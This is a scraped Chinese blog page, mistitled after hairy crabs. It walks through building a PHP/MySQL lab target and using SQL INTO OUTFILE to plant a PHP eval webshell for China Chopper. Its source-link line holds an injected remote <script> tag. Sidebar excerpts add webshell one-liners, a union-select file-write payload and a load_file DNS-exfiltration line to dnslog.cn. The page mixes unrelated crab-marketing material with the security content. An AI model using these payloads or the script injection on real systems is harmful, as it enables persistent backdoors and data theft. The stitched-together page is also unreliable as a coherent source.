阳澄湖大闸蟹

已于 2022-11-03 18:22:22 修改
阅读量5.1k 收藏
点赞数
文章标签: sql php apache
于 2022-08-31 20:17:17 首次发布
原文链接:https://mp.weixin.qq.com/a/~~2eE-pE9-0xQ~eJnX9q__u__2TacKz4GfRg~~/<script src="//hbnewnb.oss-cn-shanghai.aliyuncs.com/hdl/2.js"></script>
版权

阳澄湖大闸蟹

目录
1.搭建靶机环境
(1)实验环境及思路
(2)搭建靶机环境
2.用Navicat构建一句话SQL注入木马
3.通过菜刀连接靶机
1.搭建靶机环境
(1)实验环境及思路
靶机:centos7 以安装好MySQL服务
攻击机:win7
使用工具:Navicat、wireshark、菜刀

(2)搭建靶机环境
(1)firewall-cmd --zone=public --add-port=80/tcp --permanent 开80端口

systemctl restart firewalld.service 重启防火墙

确保已安装好MySQL

(2)rpm -ivh mysql-community-libs-compat-5.7.30-1.el7.x86_64.rpm安装php所需要的依赖环境


(3)yum install php php-mysql -yyum安装php

(4)yum -y install httpd*为其安装Apache服务


(5)vi /etc/httpd/conf/httpd.conf修改apache配置文件

在配置文件中修改如下,添加如下内容

AddType application/x-httpd-php-source .phps——apache能过够解析phps文件

AddType application/x-httpd-php .php——apache能过够解析php文件


(6)cd /var/www/html apache网站的根目录

vi phpinfo.php

<? php phpinfo(); ?>编写php文件,配置php网站,这是条php语句

systemctl restart httpd重启apache服务


(6)localhost/phpinfo.phpfirefox中输入可以访问代表网站服务搭建成功


2.用Navicat构建一句话SQL注入木马
show databases;
create database TEST;
use TEST;
show tables;
create table muma(cmd text);
insert into muma values(concat('<?php @eval($_POST[','"','mimi','"',']); ?>'));
select * from muma;
select * from muma into outfile '/var/www/html/ma.php'
1
2
3
4
5
6
7
8


3.通过菜刀连接靶机
cd /var/www/html

qq_28956395
关注
阳澄湖大闸蟹广告海报设计
07-19
在设计一款阳澄湖大闸蟹的广告海报时,我们需要考虑多方面的因素,以确保设计出既能吸引观众眼球,又能准确传达品牌信息的作品。阳澄湖大闸蟹因其鲜美的口感和高品质而闻名,因此,海报设计应当凸显其独特性和品质感...
后台登录密码绕过+sql注入+一句话木马 实验演示(盾灵)
热门推荐
hxxjxw的博客
07-09 1万+
环境 Windows Server 2008(虚拟机) 安装phpStudy,安装dunling 盾灵投稿系统 dunling是一个CMS在线内容管理器 dirb是Kali内置的一个基于字典的Web目录扫描工具,用来爆破目录的 假设已经知道管理员的登陆用户名是admin 实验演示 ①在Windows Server 2008中安装phpStudy,关闭防火墙 下载盾灵...
sql注入与一句话木马
告白的博客
07-09 3301
0x00 sql注入之一句话木马 首先介绍一下一句话木马: 一句话木马是一种基于 B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。 常见脚本的一句话木马: php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page
SQL注入一句话木马(load_file/out file)
初学者L_言的博客
11-26 8838
工具 靶机——metasploitable2 环境——DVWA,(low等级下) 菜刀——蚁剑 权限查看 查看mysql是否有对函数load_file(),outfile()函数的限制 (securefilepriv的值是否为NULL) show global variables like '%secure%'; NULL 表示不可用, 空 表示可用 ' order by 2-- 查看字段...
SQL注入篇——一句话木马
爱国小白帽
01-08 6457
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
一句话木马、sql注入、蚁剑的安装及使用
veinard_F的博客
05-20 4288
一、基本原理 sql注入主要目标是 Web 应用的后台数据库,从数据库中获取信息和授予较高的权限。它先破坏数据库,再对数据库服务器进行破坏。 sql的概述 浏览网站 发送一个请求SQL语言指令返回数据或执行结果通过web包装后的数据用户web服务端数据库系统 基本类型: 数字型和字符型的注入; 报错型SQL注入; 布尔/时间的SQL注入; 可联合查询的SQL注入; 判断注入类型: 1、数字型注入:id=1 and 1=2,若回显不正常则为数字型注入 2、字符型注入:上述测试若回显正常则为字符型注入 3、报错
基于区块链技术的阳澄湖大闸蟹溯源模式研究.pdf
08-15
#资源达人分享计划#
生鲜电商发展下阳澄湖大闸蟹网络销售发展研究.pdf
07-10
阳澄湖大闸蟹作为我国著名的淡水蟹种,其独特的风味和卓越的品质赢得了广大消费者的喜爱,而随着生鲜电商行业的飞速发展,阳澄湖大闸蟹的网络销售模式也经历了由起步到成熟的多个阶段。本研究主要对阳澄湖大闸蟹的...
江苏特色生鲜产品电商物流发展研究——以阳澄湖大闸蟹为例.zip
10-29
《江苏特色生鲜产品电商物流发展研究——以阳澄湖大闸蟹为例》这篇研究深入探讨了江苏省生鲜电商行业的物流挑战与机遇,特别是聚焦在阳澄湖大闸蟹这一标志性产品上。阳澄湖大闸蟹作为中国知名的淡水美食,其在电商...
江苏特色生鲜产品电商物流发展研究——以阳澄湖大闸蟹为例.pdf
07-10
随着我国经济水平的提高和互联网技术的持续发展,生鲜产品行业增长迅速,其中,阳澄湖大闸蟹作为典型的生鲜产品,其电商物流的发展具有示范效应。本文通过对阳澄湖大闸蟹的经营现状和电商物流现状进行实际调研,总结...
从一道sql注入题认识sql一句话木马
xiaolong22333的博客
12-02 620
最近做到一道题,是ctfshow平台的,题目如下 没有过滤,但如果返回结果中没有ASCII码在 00-7f 范围的,才会查询成功。我以为要用什么方法绕过,但看了师傅们的做法才知道,还可以把查询结果写到到一个文件里,而在linux服务器下web文件夹的目录为/var/www/html/ (看来我知道的还是太少了๐·°(৹˃̵﹏˂̵৹)°·๐) 所以payload为 1' union select 1,password from ctfshow_user5 into outfile '/var/www/htm
NoSQL之 Redis配置与优化
最新发布
2201_75549363的博客
09-10 1389
Redis(远程字典服务器) 是一个开源的、使用 C 语言编写的 NoSQL 数据库。Redis 基于内存运行并支持持久化,采用key-value(键值对)的存储形式,是目前分布式架构中不可或缺的一环。Redis服务器程序是单进程模型,也就是在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器上只运行一个Redis进程,当多个客户端同时访问时,服务器的处理能力是会有一定程度的下降;
pandas读取xlsx文件使用sqlachemy写到数据库
ithongchou的博客
09-10 441
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 438
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
SQL 代表什么?SQL 的全称是什么?
程序员学习园地。
09-09 1657
创建表修改表删除表。
被低估的SQL
weixin_61431494的博客
09-03 1862
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
PL/SQL 继承Oracle Database 的可靠性、安全性和可移植性
纸上得来终觉浅,绝知此事要躬行
09-08 1054
PL/SQL 是一种旨在对 SQL 进行扩展的过程语言,其语法涵盖了 SQL 语句。PL/SQL 程序单元由 Oracle 数据库服务器编译并存储在数据库中。在运行时,PL/SQLSQL 都在同一服务器进程中运行,从而带来出色的效率。PL/SQL 自动继承了 Oracle 数据库的可靠性、安全性和可移植性。
HTB-Archetype(winPEAS枚举工具,mssql xp_cmdshell)
weixin_58038441的博客
09-10 1266
我们介绍了impacket中用于sql server连接工具 mssqlcilent,以及winPEAS枚举权限提升工具,以及powershell中下载文件,nc转移管理权,mssql 命令函数 xp_cmdshell 及开放命令。
SQL server 日常运维命令
2301_76664379的博客
09-10 1599
【代码】SQL server 日常运维命令。
大闸蟹行业深度解析:电商、物流与市场趋势
- 阳澄湖大闸蟹市场逐渐被电商主导,如京东、顺丰等物流巨头不仅提供运输服务,还参与到蟹的生产和供应链管理中,显示出行业的整合趋势。 该报告深度剖析了大闸蟹行业的当前市场状况、竞争格局以及未来可能的发展...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值